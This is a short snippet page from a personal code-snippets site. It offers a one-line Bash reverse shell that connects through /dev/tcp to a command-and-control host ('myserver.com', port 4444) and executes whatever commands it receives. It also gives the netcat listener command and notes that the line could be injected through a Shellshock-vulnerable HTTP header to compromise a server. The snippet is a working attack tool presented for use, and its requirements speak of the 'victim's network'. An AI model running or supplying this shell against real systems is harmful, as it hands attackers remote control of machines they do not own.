Simple Reverse Shell



Published: 2017-05-14 12:39:38 +0000
Categories: BASH,

Language

BASH

Description

The below is an example of a simple reverse shell to a C&C server (which we assume is myserver.com)

On the C&C server you simply need something listening on the relevant port:

nc -l 4444

Back when Shellshock was at it's highest levels, you could simply inject this into a HTTP header to have the server connect back to you

Snippet

exec 5<>/dev/tcp/myserver.com/4444 ; cat <&5 | while read evil; do $evil 2>&5 >&5; done

Requires

  • Kernel /dev/tcp support (present by default in most builds)
  • Sufficiently loose egress controls on the victim's network

Video Example

Keywords

Reverse, Shell, exec, Example,

Latest Posts

Urldecode string (LUA)
FFMPEG Convert YUV444p to YUV420p (BASH)
Forcing FFMPEG to honour segment length in HLS Stream Creator (BASH)
Force CURL to place request to a specific IP (BASH)
Set a variable only if it is undefined (Javascript)
Ignore query string with Nginx caching proxy (NGinx)
Get breakdown of UK and non-UK votes for a Parliamentary Petition (Python)
Decompress Mozilla Firefox jsonlz4 bookmark backup files (Python)
Setting Git author details for a single repo (Git)
Checking Virtual Machine Resource Allocations with Libvirt (BASH)

Copyright © 2019 Ben Tasker | Sitemap | Privacy Policy
Available at snippets.bentasker.co.uk and snippets.6zdgh5a5e6zpchdz.onion